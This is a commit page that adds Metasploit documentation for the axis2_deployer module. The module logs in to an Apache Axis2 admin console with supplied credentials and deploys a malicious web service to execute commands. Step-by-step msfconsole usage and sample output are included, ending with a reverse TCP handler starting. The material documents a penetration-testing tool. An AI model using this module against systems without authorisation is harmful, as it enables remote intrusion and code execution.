Skip to content

Commit dfaec8b

Browse files
committed
Land rapid7#8148, Add module documentation for axis2_deployer
2 parents 92c0748 + 03d6e45 commit dfaec8b

File tree

1 file changed

+58
-0
lines changed

1 file changed

+58
-0
lines changed
Lines changed: 58 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,58 @@
1+
## Description
2+
3+
This module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.
4+
5+
## Axis2 Web Admin
6+
7+
The Apache Axis2 Web application has three main sections:'Services' lists all the available services deployed in this server, 'Validate' checks the system to see whether all the required libraries are in place and views the system information, and 'Administration' is the Axis2 Web Administration module which is the console for administering the Apache Axis2 installation. The Axis2 Web Administration module provides a way to configure Axis2 dynamically.
8+
9+
**IMPORTANT:** This dynamic configuration will NOT be persistent, i.e., if the servlet container is restarted, then all the dynamic configuration changes will be lost.
10+
11+
## Verification Steps
12+
13+
1. Do: ```use exploit/multi/http/axis2_deployer```
14+
2. Do: ```set RHOSTS [IP]```
15+
3. Do: ```set RPORT [PORT]```
16+
3. Do: ```set USERNAME [Username]```
17+
4. Do: ```set PASSWORD [Password]```
18+
5. Do: ```run```
19+
20+
## Sample Output
21+
22+
```
23+
msf > use exploit/multi/http/axis2_deployer
24+
msf exploit(axis2_deployer) > set RHOST 10.10.155.37
25+
RHOST => 10.10.155.37
26+
msf exploit(axis2_deployer) > set RPORT 8080
27+
RPORT => 8080
28+
msf exploit(axis2_deployer) > set USERNAME admin
29+
USERNAME => admin
30+
msf exploit(axis2_deployer) > set PASSWORD admin123
31+
PASSWORD => admin123
32+
msf exploit(axis2_deployer) > show options
33+
34+
Module options (exploit/multi/http/axis2_deployer):
35+
36+
Name Current Setting Required Description
37+
---- --------------- -------- -----------
38+
PASSWORD admin123 no The password for the specified username
39+
PATH /axis2 yes The URI path of the axis2 app (use /dswsbobje for SAP BusinessObjects)
40+
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
41+
RHOST 10.10.155.37 yes The target address
42+
RPORT 8080 yes The target port
43+
SSL false no Negotiate SSL/TLS for outgoing connections
44+
USERNAME admin no The username to authenticate as
45+
VHOST no HTTP server virtual host
46+
47+
48+
Exploit target:
49+
50+
Id Name
51+
-- ----
52+
0 Java
53+
54+
msf exploit(axis2_deployer) > exploit
55+
56+
[*] Started reverse TCP handler on 10.10.155.39:4444
57+
58+
```

0 commit comments

Comments
 (0)